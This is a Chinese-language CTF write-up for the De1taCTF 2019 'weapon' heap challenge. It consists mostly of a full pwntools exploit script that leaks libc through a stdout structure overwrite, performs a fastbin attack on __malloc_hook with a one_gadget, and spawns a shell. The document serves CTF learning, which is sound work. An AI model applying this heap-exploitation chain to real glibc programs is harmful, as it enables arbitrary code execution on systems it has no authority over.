De1taCTF2019-weapon

届到了.jpg

虽然还是一知半解,但是至少知道了利用stdout leak的方法,掌握了一种无输出函数的leak方法。

同时还学到了利用scanf读入大量字符时,会申请一个0x400堆块,把已有的fastbin置入smallbin的操作,这样就可以在限制了分配大小的情况下leaklibc了。

leaklibc -> fastbin attack -> get shell

EXP (不知道为啥leak之后输出就变的和包函数时不一样了只能手动写

1
#coding=UTF-8
from pwn import *
from LibcSearcher import *
#context.log_level='debug'
onegadget=[0x45216,0x4526a,0xf02a4,0xf1147] #libc.so.6
def create(size,idx,content):
	sh.recvuntil("choice >> ")
	sh.sendline("1")
	sh.recvuntil("weapon: ")
	sh.sendline(str(int(size)))
	sh.recvuntil("index: ")
	sh.sendline(str(idx))
	sh.recvuntil("input your name:\n")
	sh.send(content)
def rename(idx,content):
	sh.recvuntil("choice >> ")
	sh.sendline("3")
	sh.recvuntil("idx: ")
	sh.sendline(str(int(idx)))
	sh.recvuntil("content:\n")
	sh.send(content)
def delete(idx):
	sh.recvuntil("choice >> ")
	sh.sendline("2")
	sh.recvuntil("idx :")	
	sh.sendline(str(idx))
libc=ELF('./pwn').libc
while True:
	sh=process('./pwn')
	create(0x60,0,"a")
	create(0x60,1,"a")
	create(0x60,2,"a")
	delete(0)
	delete(1)
	sh.recvuntil("choice >> ")
	sh.sendline("1"*0x400)
	create(0x60,3,"\xdd\x25")
	create(0x60,4,'d')
	delete(2)
	delete(1)
	rename(1,'\x00')
	create(0x60,5,'a')
	create(0x60,6,'a')
	try:
		create(0x60,7,'\x00'*0x33+p64(0xfbad1800)+p64(0)*3+'\x08')		
	except EOFError:
		sh.close()
		continue	 	
	else:
		sh.recvuntil(p64(0xfbad1800)+'\x00'*24)
		leak=u64(sh.recv(6)+'\x00\x00')
		mallochook=0x7f20568e1b10+leak-0x7f20568e2608
		log.success("malloc_hook: "+hex(mallochook))
		libcbase=mallochook-libc.symbols['__malloc_hook']
		log.success("libcbase: "+hex(libcbase))
		sh.recvuntil("choice >> ")
		sh.sendline("1")
		sh.recvuntil("weapon: ")
		sh.sendline(str(int(0x60)))
		sh.recvuntil("index: ")
		sh.sendline(str(7))
		sh.recvuntil("input your name:")
		sh.send("content")
		delete(7)
		sh.recvuntil("choice >> ")
		sh.sendline("3")
		sh.recvuntil("idx: ")
		sh.sendline(str(int(7)))
		sh.recvuntil("content:")
		sh.send(p64(mallochook-0x23))
		sh.recvuntil("choice >> ")
		sh.sendline("1")
		sh.recvuntil("weapon: ")
		sh.sendline(str(int(0x60)))
		sh.recvuntil("index: ")
		sh.sendline(str(8))
		sh.recvuntil("input your name:")
		sh.send("content")
		sh.recvuntil("choice >> ")
		sh.sendline("1")
		sh.recvuntil("weapon: ")
		sh.sendline(str(int(0x60)))
		sh.recvuntil("index: ")
		sh.sendline(str(9))
		sh.recvuntil("input your name:")
		sh.send('\x00'*19+p64(libcbase+onegadget[3]))
		delete(0)
		delete(0)
		sh.interactive()
		break
文章目录
|